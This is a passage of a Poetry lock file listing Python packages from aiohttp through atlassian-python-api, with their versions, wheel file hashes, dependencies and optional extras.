{file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:ec4fd86658c6a8964d75426517dc01cbf840bbf32d055ce64a9e63a40fd7b771"},
{file = "aiohttp-3.8.6-cp38-cp38-win32.whl", hash = "sha256:33164093be11fcef3ce2571a0dccd9041c9a93fa3bde86569d7b03120d276c6f"},
{file = "aiohttp-3.8.6-cp38-cp38-win_amd64.whl", hash = "sha256:bdf70bfe5a1414ba9afb9d49f0c912dc524cf60141102f3a11143ba3d291870f"},
{file = "aiohttp-3.8.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d52d5dc7c6682b720280f9d9db41d36ebe4791622c842e258c9206232251ab2b"},
{file = "aiohttp-3.8.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:4ac39027011414dbd3d87f7edb31680e1f430834c8cef029f11c66dad0670aa5"},
{file = "aiohttp-3.8.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3f5c7ce535a1d2429a634310e308fb7d718905487257060e5d4598e29dc17f0b"},
{file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b30e963f9e0d52c28f284d554a9469af073030030cef8693106d918b2ca92f54"},
{file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:918810ef188f84152af6b938254911055a72e0f935b5fbc4c1a4ed0b0584aed1"},
{file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:002f23e6ea8d3dd8d149e569fd580c999232b5fbc601c48d55398fbc2e582e8c"},
{file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4fcf3eabd3fd1a5e6092d1242295fa37d0354b2eb2077e6eb670accad78e40e1"},
{file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:255ba9d6d5ff1a382bb9a578cd563605aa69bec845680e21c44afc2670607a95"},
{file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:d67f8baed00870aa390ea2590798766256f31dc5ed3ecc737debb6e97e2ede78"},
{file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:86f20cee0f0a317c76573b627b954c412ea766d6ada1a9fcf1b805763ae7feeb"},
{file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:39a312d0e991690ccc1a61f1e9e42daa519dcc34ad03eb6f826d94c1190190dd"},
{file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:e827d48cf802de06d9c935088c2924e3c7e7533377d66b6f31ed175c1620e05e"},
{file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bd111d7fc5591ddf377a408ed9067045259ff2770f37e2d94e6478d0f3fc0c17"},
{file = "aiohttp-3.8.6-cp39-cp39-win32.whl", hash = "sha256:caf486ac1e689dda3502567eb89ffe02876546599bbf915ec94b1fa424eeffd4"},
{file = "aiohttp-3.8.6-cp39-cp39-win_amd64.whl", hash = "sha256:3f0e27e5b733803333bb2371249f41cf42bae8884863e8e8965ec69bebe53132"},
{file = "aiohttp-3.8.6.tar.gz", hash = "sha256:b0cf2a4501bff9330a8a5248b4ce951851e415bdcce9dc158e76cfd55e15085c"},
]
[package.dependencies]
aiosignal = ">=1.1.2"
async-timeout = ">=4.0.0a3,<5.0"
attrs = ">=17.3.0"
charset-normalizer = ">=2.0,<4.0"
frozenlist = ">=1.1.1"
multidict = ">=4.5,<7.0"
yarl = ">=1.0,<2.0"
[package.extras]
speedups = ["Brotli", "aiodns", "cchardet"]
[[package]]
name = "aiohttp-retry"
version = "2.8.3"
description = "Simple retry client for aiohttp"
optional = true
python-versions = ">=3.7"
files = [
{file = "aiohttp_retry-2.8.3-py3-none-any.whl", hash = "sha256:3aeeead8f6afe48272db93ced9440cf4eda8b6fd7ee2abb25357b7eb28525b45"},
{file = "aiohttp_retry-2.8.3.tar.gz", hash = "sha256:9a8e637e31682ad36e1ff9f8bcba912fcfc7d7041722bc901a4b948da4d71ea9"},
]
[package.dependencies]
aiohttp = "*"
[[package]]
name = "aioitertools"
version = "0.11.0"
description = "itertools and builtins for AsyncIO and mixed iterables"
optional = true
python-versions = ">=3.6"
files = [
{file = "aioitertools-0.11.0-py3-none-any.whl", hash = "sha256:04b95e3dab25b449def24d7df809411c10e62aab0cbe31a50ca4e68748c43394"},
{file = "aioitertools-0.11.0.tar.gz", hash = "sha256:42c68b8dd3a69c2bf7f2233bf7df4bb58b557bca5252ac02ed5187bbc67d6831"},
]
[package.dependencies]
typing_extensions = {version = ">=4.0", markers = "python_version < \"3.10\""}
[[package]]
name = "aiosignal"
version = "1.3.1"
description = "aiosignal: a list of registered asynchronous callbacks"
optional = false
python-versions = ">=3.7"
files = [
{file = "aiosignal-1.3.1-py3-none-any.whl", hash = "sha256:f8376fb07dd1e86a584e4fcdec80b36b7f81aac666ebc724e2c090300dd83b17"},
{file = "aiosignal-1.3.1.tar.gz", hash = "sha256:54cd96e15e1649b75d6c87526a6ff0b6c1b0dd3459f43d9ca11d48c339b68cfc"},
]
[package.dependencies]
frozenlist = ">=1.1.0"
[[package]]
name = "aiosqlite"
version = "0.19.0"
description = "asyncio bridge to the standard sqlite3 module"
optional = true
python-versions = ">=3.7"
files = [
{file = "aiosqlite-0.19.0-py3-none-any.whl", hash = "sha256:edba222e03453e094a3ce605db1b970c4b3376264e56f32e2a4959f948d66a96"},
{file = "aiosqlite-0.19.0.tar.gz", hash = "sha256:95ee77b91c8d2808bd08a59fbebf66270e9090c3d92ffbf260dc0db0b979577d"},
]
[package.extras]
dev = ["aiounittest (==1.4.1)", "attribution (==1.6.2)", "black (==23.3.0)", "coverage[toml] (==7.2.3)", "flake8 (==5.0.4)", "flake8-bugbear (==23.3.12)", "flit (==3.7.1)", "mypy (==1.2.0)", "ufmt (==2.1.0)", "usort (==1.0.6)"]
docs = ["sphinx (==6.1.3)", "sphinx-mdinclude (==0.5.3)"]
[[package]]
name = "aleph-alpha-client"
version = "2.17.0"
description = "python client to interact with Aleph Alpha api endpoints"
optional = true
python-versions = "*"
files = [
{file = "aleph-alpha-client-2.17.0.tar.gz", hash = "sha256:c2d664c7b829f4932306153bec45e11c08e03252f1dbfd9f48584c402d7050a3"},
{file = "aleph_alpha_client-2.17.0-py3-none-any.whl", hash = "sha256:9106a36a5e08dba6aea2b0b2a0de6ff0c3bb77926edc98226debae121b0925e2"},
]
[package.dependencies]
aiodns = ">=3.0.0"
aiohttp = ">=3.8.3"
aiohttp-retry = ">=2.8.3"
Pillow = ">=9.2.0"
requests = ">=2.28"
tokenizers = ">=0.13.2"
typing-extensions = ">=4.5.0"
urllib3 = ">=1.26"
[package.extras]
dev = ["black", "ipykernel", "mypy", "nbconvert", "pytest", "pytest-aiohttp", "pytest-cov", "pytest-dotenv", "pytest-httpserver", "types-Pillow", "types-requests"]
docs = ["sphinx", "sphinx-rtd-theme"]
test = ["pytest", "pytest-aiohttp", "pytest-cov", "pytest-dotenv", "pytest-httpserver"]
types = ["mypy", "types-Pillow", "types-requests"]
[[package]]
name = "altair"
version = "4.2.2"
description = "Altair: A declarative statistical visualization library for Python."
optional = true
python-versions = ">=3.7"
files = [
{file = "altair-4.2.2-py3-none-any.whl", hash = "sha256:8b45ebeaf8557f2d760c5c77b79f02ae12aee7c46c27c06014febab6f849bc87"},
{file = "altair-4.2.2.tar.gz", hash = "sha256:39399a267c49b30d102c10411e67ab26374156a84b1aeb9fcd15140429ba49c5"},
]
[package.dependencies]
entrypoints = "*"
jinja2 = "*"
jsonschema = ">=3.0"
numpy = "*"
pandas = ">=0.18"
toolz = "*"
[package.extras]
dev = ["black", "docutils", "flake8", "ipython", "m2r", "mistune (<2.0.0)", "pytest", "recommonmark", "sphinx", "vega-datasets"]
[[package]]
name = "amadeus"
version = "9.0.0"
description = "Python module for the Amadeus travel APIs"
optional = true
python-versions = ">=3.4.8"
files = [
{file = "amadeus-9.0.0.tar.gz", hash = "sha256:d19805e19d699d2633911c5b52400f82c6719676cc1488f8ccf344dbc4eb3202"},
]
[[package]]
name = "amazon-textract-caller"
version = "0.2.1"
description = "Amazon Textract Caller tools"
optional = true
python-versions = ">=3.6"
files = [
{file = "amazon-textract-caller-0.2.1.tar.gz", hash = "sha256:7a531ba4841fb64718b9430c05796958b426f41a4d674d4996f9e56cd3849f4e"},
{file = "amazon_textract_caller-0.2.1-py2.py3-none-any.whl", hash = "sha256:ccdeb364e02ce7c2034b69c09209954e995a0ee19f5d3dea79f25171a9565c37"},
]
[package.dependencies]
amazon-textract-response-parser = ">=0.1.39"
boto3 = ">=1.26.35"
botocore = "*"
[package.extras]
testing = ["amazon-textract-response-parser", "pytest"]
[[package]]
name = "amazon-textract-response-parser"
version = "1.0.1"
description = "Easily parse JSON returned by Amazon Textract."
optional = true
python-versions = ">=3.8"
files = [
{file = "amazon-textract-response-parser-1.0.1.tar.gz", hash = "sha256:d9ddedb75d12c9f5dc7cf65811c96c3934c0dfa8ef76543882cc1077618a301f"},
{file = "amazon_textract_response_parser-1.0.1-py2.py3-none-any.whl", hash = "sha256:890eba2c6bc33f4088c08c4df93088cd540896eca3243b7612635ea456f759c7"},
]
[package.dependencies]
boto3 = "*"
marshmallow = ">=3.14,<4"
[[package]]
name = "anthropic"
version = "0.3.11"
description = "Client library for the anthropic API"
optional = false
python-versions = ">=3.7,<4.0"
files = [
{file = "anthropic-0.3.11-py3-none-any.whl", hash = "sha256:5c81105cd9ee7388bff3fdb739aaddedc83bbae9b95d51c2d50c13b1ad106138"},
{file = "anthropic-0.3.11.tar.gz", hash = "sha256:2e0fa5351c9b368cbed0bbd7217deaa9409b82b56afaf244e2196e99eb4fe20e"},
]
[package.dependencies]
anyio = ">=3.5.0,<4"
distro = ">=1.7.0,<2"
httpx = ">=0.23.0,<1"
pydantic = ">=1.9.0,<3"
tokenizers = ">=0.13.0"
typing-extensions = ">=4.5,<5"
[[package]]
name = "anyio"
version = "3.7.1"
description = "High level compatibility layer for multiple asynchronous event loop implementations"
optional = false
python-versions = ">=3.7"
files = [
{file = "anyio-3.7.1-py3-none-any.whl", hash = "sha256:91dee416e570e92c64041bd18b900d1d6fa78dff7048769ce5ac5ddad004fbb5"},
{file = "anyio-3.7.1.tar.gz", hash = "sha256:44a3c9aba0f5defa43261a8b3efb97891f2bd7d804e0e1f56419befa1adfc780"},
]
[package.dependencies]
exceptiongroup = {version = "*", markers = "python_version < \"3.11\""}
idna = ">=2.8"
sniffio = ">=1.1"
[package.extras]
doc = ["Sphinx", "packaging", "sphinx-autodoc-typehints (>=1.2.0)", "sphinx-rtd-theme (>=1.2.2)", "sphinxcontrib-jquery"]
test = ["anyio[trio]", "coverage[toml] (>=4.5)", "hypothesis (>=4.0)", "mock (>=4)", "psutil (>=5.9)", "pytest (>=7.0)", "pytest-mock (>=3.6.1)", "trustme", "uvloop (>=0.17)"]
trio = ["trio (<0.22)"]
[[package]]
name = "appnope"
version = "0.1.3"
description = "Disable App Nap on macOS >= 10.9"
optional = false
python-versions = "*"
files = [
{file = "appnope-0.1.3-py2.py3-none-any.whl", hash = "sha256:265a455292d0bd8a72453494fa24df5a11eb18373a60c7c0430889f22548605e"},
{file = "appnope-0.1.3.tar.gz", hash = "sha256:02bd91c4de869fbb1e1c50aafc4098827a7a54ab2f39d9dcba6c9547ed920e24"},
]
[[package]]
name = "argon2-cffi"
version = "23.1.0"
description = "Argon2 for Python"
optional = false
python-versions = ">=3.7"
files = [
{file = "argon2_cffi-23.1.0-py3-none-any.whl", hash = "sha256:c670642b78ba29641818ab2e68bd4e6a78ba53b7eff7b4c3815ae16abf91c7ea"},
{file = "argon2_cffi-23.1.0.tar.gz", hash = "sha256:879c3e79a2729ce768ebb7d36d4609e3a78a4ca2ec3a9f12286ca057e3d0db08"},
]
[package.dependencies]
argon2-cffi-bindings = "*"
[package.extras]
dev = ["argon2-cffi[tests,typing]", "tox (>4)"]
docs = ["furo", "myst-parser", "sphinx", "sphinx-copybutton", "sphinx-notfound-page"]
tests = ["hypothesis", "pytest"]
typing = ["mypy"]
[[package]]
name = "argon2-cffi-bindings"
version = "21.2.0"
description = "Low-level CFFI bindings for Argon2"
optional = false
python-versions = ">=3.6"
files = [
{file = "argon2-cffi-bindings-21.2.0.tar.gz", hash = "sha256:bb89ceffa6c791807d1305ceb77dbfacc5aa499891d2c55661c6459651fc39e3"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:ccb949252cb2ab3a08c02024acb77cfb179492d5701c7cbdbfd776124d4d2367"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9524464572e12979364b7d600abf96181d3541da11e23ddf565a32e70bd4dc0d"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b746dba803a79238e925d9046a63aa26bf86ab2a2fe74ce6b009a1c3f5c8f2ae"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:58ed19212051f49a523abb1dbe954337dc82d947fb6e5a0da60f7c8471a8476c"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:bd46088725ef7f58b5a1ef7ca06647ebaf0eb4baff7d1d0d177c6cc8744abd86"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_i686.whl", hash = "sha256:8cd69c07dd875537a824deec19f978e0f2078fdda07fd5c42ac29668dda5f40f"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:f1152ac548bd5b8bcecfb0b0371f082037e47128653df2e8ba6e914d384f3c3e"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-win32.whl", hash = "sha256:603ca0aba86b1349b147cab91ae970c63118a0f30444d4bc80355937c950c082"},
{file = "argon2_cffi_bindings-21.2.0-cp36-abi3-win_amd64.whl", hash = "sha256:b2ef1c30440dbbcba7a5dc3e319408b59676e2e039e2ae11a8775ecf482b192f"},
{file = "argon2_cffi_bindings-21.2.0-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:e415e3f62c8d124ee16018e491a009937f8cf7ebf5eb430ffc5de21b900dad93"},
{file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3e385d1c39c520c08b53d63300c3ecc28622f076f4c2b0e6d7e796e9f6502194"},
{file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2c3e3cc67fdb7d82c4718f19b4e7a87123caf8a93fde7e23cf66ac0337d3cb3f"},
{file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a22ad9800121b71099d0fb0a65323810a15f2e292f2ba450810a7316e128ee5"},
{file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f9f8b450ed0547e3d473fdc8612083fd08dd2120d6ac8f73828df9b7d45bb351"},
{file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:93f9bf70084f97245ba10ee36575f0c3f1e7d7724d67d8e5b08e61787c320ed7"},
{file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3b9ef65804859d335dc6b31582cad2c5166f0c3e7975f324d9ffaa34ee7e6583"},
{file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d4966ef5848d820776f5f562a7d45fdd70c2f330c961d0d745b784034bd9f48d"},
{file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:20ef543a89dee4db46a1a6e206cd015360e5a75822f76df533845c3cbaf72670"},
{file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ed2937d286e2ad0cc79a7087d3c272832865f779430e0cc2b4f3718d3159b0cb"},
{file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:5e00316dabdaea0b2dd82d141cc66889ced0cdcbfa599e8b471cf22c620c329a"},
]
[package.dependencies]
cffi = ">=1.0.1"
[package.extras]
dev = ["cogapp", "pre-commit", "pytest", "wheel"]
tests = ["pytest"]
[[package]]
name = "arrow"
version = "1.3.0"
description = "Better dates & times for Python"
optional = false
python-versions = ">=3.8"
files = [
{file = "arrow-1.3.0-py3-none-any.whl", hash = "sha256:c728b120ebc00eb84e01882a6f5e7927a53960aa990ce7dd2b10f39005a67f80"},
{file = "arrow-1.3.0.tar.gz", hash = "sha256:d4540617648cb5f895730f1ad8c82a65f2dad0166f57b75f3ca54759c4d67a85"},
]
[package.dependencies]
python-dateutil = ">=2.7.0"
types-python-dateutil = ">=2.8.10"
[package.extras]
doc = ["doc8", "sphinx (>=7.0.0)", "sphinx-autobuild", "sphinx-autodoc-typehints", "sphinx_rtd_theme (>=1.3.0)"]
test = ["dateparser (==1.*)", "pre-commit", "pytest", "pytest-cov", "pytest-mock", "pytz (==2021.1)", "simplejson (==3.*)"]
[[package]]
name = "arxiv"
version = "1.4.8"
description = "Python wrapper for the arXiv API: http://arxiv.org/help/api/"
optional = true
python-versions = ">=3.7"
files = [
{file = "arxiv-1.4.8-py3-none-any.whl", hash = "sha256:c3dbef0fb7ed85c9b4c2157b40a62f5a04ce0d2f63c3ff7caa7798abf6166378"},
{file = "arxiv-1.4.8.tar.gz", hash = "sha256:2a818ea749eaa62a6e24fc31d53b769b4d33ff55cfc5dda7c7b7d309a3b29373"},
]
[package.dependencies]
feedparser = "*"
[[package]]
name = "assemblyai"
version = "0.17.0"
description = "AssemblyAI Python SDK"
optional = true
python-versions = ">=3.8"
files = [
{file = "assemblyai-0.17.0-py3-none-any.whl", hash = "sha256:3bad8cc7545b5b831f243f1b2f01bc4cc0e8aad78babf44c8008f2293c540e36"},
{file = "assemblyai-0.17.0.tar.gz", hash = "sha256:6d5bbfbbaa626ed021c3d3dec0ca52b3ebf6e6ef277ac76a7a6aed52182d531e"},
]
[package.dependencies]
httpx = ">=0.19.0"
pydantic = ">=1.7.0,<1.10.7 || >1.10.7"
typing-extensions = ">=3.7"
websockets = ">=11.0"
[package.extras]
extras = ["pyaudio (>=0.2.13)"]
[[package]]
name = "asttokens"
version = "2.4.1"
description = "Annotate AST trees with source code positions"
optional = false
python-versions = "*"
files = [
{file = "asttokens-2.4.1-py2.py3-none-any.whl", hash = "sha256:051ed49c3dcae8913ea7cd08e46a606dba30b79993209636c4875bc1d637bc24"},
{file = "asttokens-2.4.1.tar.gz", hash = "sha256:b03869718ba9a6eb027e134bfdf69f38a236d681c83c160d510768af11254ba0"},
]
[package.dependencies]
six = ">=1.12.0"
[package.extras]
astroid = ["astroid (>=1,<2)", "astroid (>=2,<4)"]
test = ["astroid (>=1,<2)", "astroid (>=2,<4)", "pytest"]
[[package]]
name = "astunparse"
version = "1.6.3"
description = "An AST unparser for Python"
optional = true
python-versions = "*"
files = [
{file = "astunparse-1.6.3-py2.py3-none-any.whl", hash = "sha256:c2652417f2c8b5bb325c885ae329bdf3f86424075c4fd1a128674bc6fba4b8e8"},
{file = "astunparse-1.6.3.tar.gz", hash = "sha256:5ad93a8456f0d084c3456d059fd9a92cce667963232cbf763eac3bc5b7940872"},
]
[package.dependencies]
six = ">=1.6.1,<2.0"
wheel = ">=0.23.0,<1.0"
[[package]]
name = "async-lru"
version = "2.0.4"
description = "Simple LRU cache for asyncio"
optional = false
python-versions = ">=3.8"
files = [
{file = "async-lru-2.0.4.tar.gz", hash = "sha256:b8a59a5df60805ff63220b2a0c5b5393da5521b113cd5465a44eb037d81a5627"},
{file = "async_lru-2.0.4-py3-none-any.whl", hash = "sha256:ff02944ce3c288c5be660c42dbcca0742b32c3b279d6dceda655190240b99224"},
]
[package.dependencies]
typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""}
[[package]]
name = "async-timeout"
version = "4.0.3"
description = "Timeout context manager for asyncio programs"
optional = false
python-versions = ">=3.7"
files = [
{file = "async-timeout-4.0.3.tar.gz", hash = "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f"},
{file = "async_timeout-4.0.3-py3-none-any.whl", hash = "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028"},
]
[[package]]
name = "asyncpg"
version = "0.28.0"
description = "An asyncio PostgreSQL driver"
optional = true
python-versions = ">=3.7.0"
files = [
{file = "asyncpg-0.28.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a6d1b954d2b296292ddff4e0060f494bb4270d87fb3655dd23c5c6096d16d83"},
{file = "asyncpg-0.28.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0740f836985fd2bd73dca42c50c6074d1d61376e134d7ad3ad7566c4f79f8184"},
{file = "asyncpg-0.28.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e907cf620a819fab1737f2dd90c0f185e2a796f139ac7de6aa3212a8af96c050"},
{file = "asyncpg-0.28.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:86b339984d55e8202e0c4b252e9573e26e5afa05617ed02252544f7b3e6de3e9"},
{file = "asyncpg-0.28.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0c402745185414e4c204a02daca3d22d732b37359db4d2e705172324e2d94e85"},
{file = "asyncpg-0.28.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c88eef5e096296626e9688f00ab627231f709d0e7e3fb84bb4413dff81d996d7"},
{file = "asyncpg-0.28.0-cp310-cp310-win32.whl", hash = "sha256:90a7bae882a9e65a9e448fdad3e090c2609bb4637d2a9c90bfdcebbfc334bf89"},
{file = "asyncpg-0.28.0-cp310-cp310-win_amd64.whl", hash = "sha256:76aacdcd5e2e9999e83c8fbcb748208b60925cc714a578925adcb446d709016c"},
{file = "asyncpg-0.28.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a0e08fe2c9b3618459caaef35979d45f4e4f8d4f79490c9fa3367251366af207"},
{file = "asyncpg-0.28.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:b24e521f6060ff5d35f761a623b0042c84b9c9b9fb82786aadca95a9cb4a893b"},
{file = "asyncpg-0.28.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:99417210461a41891c4ff301490a8713d1ca99b694fef05dabd7139f9d64bd6c"},
{file = "asyncpg-0.28.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f029c5adf08c47b10bcdc857001bbef551ae51c57b3110964844a9d79ca0f267"},
{file = "asyncpg-0.28.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ad1d6abf6c2f5152f46fff06b0e74f25800ce8ec6c80967f0bc789974de3c652"},
{file = "asyncpg-0.28.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d7fa81ada2807bc50fea1dc741b26a4e99258825ba55913b0ddbf199a10d69d8"},
{file = "asyncpg-0.28.0-cp311-cp311-win32.whl", hash = "sha256:f33c5685e97821533df3ada9384e7784bd1e7865d2b22f153f2e4bd4a083e102"},
{file = "asyncpg-0.28.0-cp311-cp311-win_amd64.whl", hash = "sha256:5e7337c98fb493079d686a4a6965e8bcb059b8e1b8ec42106322fc6c1c889bb0"},
{file = "asyncpg-0.28.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1c56092465e718a9fdcc726cc3d9dcf3a692e4834031c9a9f871d92a75d20d48"},
{file = "asyncpg-0.28.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4acd6830a7da0eb4426249d71353e8895b350daae2380cb26d11e0d4a01c5472"},
{file = "asyncpg-0.28.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:63861bb4a540fa033a56db3bb58b0c128c56fad5d24e6d0a8c37cb29b17c1c7d"},
{file = "asyncpg-0.28.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:a93a94ae777c70772073d0512f21c74ac82a8a49be3a1d982e3f259ab5f27307"},
{file = "asyncpg-0.28.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d14681110e51a9bc9c065c4e7944e8139076a778e56d6f6a306a26e740ed86d2"},
{file = "asyncpg-0.28.0-cp37-cp37m-win32.whl", hash = "sha256:8aec08e7310f9ab322925ae5c768532e1d78cfb6440f63c078b8392a38aa636a"},
{file = "asyncpg-0.28.0-cp37-cp37m-win_amd64.whl", hash = "sha256:319f5fa1ab0432bc91fb39b3960b0d591e6b5c7844dafc92c79e3f1bff96abef"},
{file = "asyncpg-0.28.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b337ededaabc91c26bf577bfcd19b5508d879c0ad009722be5bb0a9dd30b85a0"},
{file = "asyncpg-0.28.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4d32b680a9b16d2957a0a3cc6b7fa39068baba8e6b728f2e0a148a67644578f4"},
{file = "asyncpg-0.28.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f4f62f04cdf38441a70f279505ef3b4eadf64479b17e707c950515846a2df197"},
{file = "asyncpg-0.28.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4f20cac332c2576c79c2e8e6464791c1f1628416d1115935a34ddd7121bfc6a4"},
{file = "asyncpg-0.28.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:59f9712ce01e146ff71d95d561fb68bd2d588a35a187116ef05028675462d5ed"},
{file = "asyncpg-0.28.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fc9e9f9ff1aa0eddcc3247a180ac9e9b51a62311e988809ac6152e8fb8097756"},
{file = "asyncpg-0.28.0-cp38-cp38-win32.whl", hash = "sha256:9e721dccd3838fcff66da98709ed884df1e30a95f6ba19f595a3706b4bc757e3"},
{file = "asyncpg-0.28.0-cp38-cp38-win_amd64.whl", hash = "sha256:8ba7d06a0bea539e0487234511d4adf81dc8762249858ed2a580534e1720db00"},
{file = "asyncpg-0.28.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d009b08602b8b18edef3a731f2ce6d3f57d8dac2a0a4140367e194eabd3de457"},
{file = "asyncpg-0.28.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ec46a58d81446d580fb21b376ec6baecab7288ce5a578943e2fc7ab73bf7eb39"},
{file = "asyncpg-0.28.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7b48ceed606cce9e64fd5480a9b0b9a95cea2b798bb95129687abd8599c8b019"},
{file = "asyncpg-0.28.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8858f713810f4fe67876728680f42e93b7e7d5c7b61cf2118ef9153ec16b9423"},
{file = "asyncpg-0.28.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:5e18438a0730d1c0c1715016eacda6e9a505fc5aa931b37c97d928d44941b4bf"},
{file = "asyncpg-0.28.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:e9c433f6fcdd61c21a715ee9128a3ca48be8ac16fa07be69262f016bb0f4dbd2"},
{file = "asyncpg-0.28.0-cp39-cp39-win32.whl", hash = "sha256:41e97248d9076bc8e4849da9e33e051be7ba37cd507cbd51dfe4b2d99c70e3dc"},
{file = "asyncpg-0.28.0-cp39-cp39-win_amd64.whl", hash = "sha256:3ed77f00c6aacfe9d79e9eff9e21729ce92a4b38e80ea99a58ed382f42ebd55b"},
{file = "asyncpg-0.28.0.tar.gz", hash = "sha256:7252cdc3acb2f52feaa3664280d3bcd78a46bd6c10bfd681acfffefa1120e278"},
]
[package.extras]
docs = ["Sphinx (>=5.3.0,<5.4.0)", "sphinx-rtd-theme (>=1.2.2)", "sphinxcontrib-asyncio (>=0.3.0,<0.4.0)"]
test = ["flake8 (>=5.0,<6.0)", "uvloop (>=0.15.3)"]
[[package]]
name = "atlassian-python-api"
version = "3.41.3"
description = "Python Atlassian REST API Wrapper"
optional = true
python-versions = "*"
files = [
{file = "atlassian-python-api-3.41.3.tar.gz", hash = "sha256:a29aae8f456babe125e3371a0355018e9c1d37190333efc312bd81163bd96ffd"},
{file = "atlassian_python_api-3.41.3-py3-none-any.whl", hash = "sha256:7661d3ce3c80e887a7e5ec1c61c1e37d3eaacb4857e377b38ef4084d0f067757"},
]
[package.dependencies]
deprecated = "*"
oauthlib = "*"
requests = "*"
requests-oauthlib = "*"
six = "*"
[package.extras]
kerberos = ["requests-kerberos"]
[[package]]
name = "attr"
version = "0.3.2"
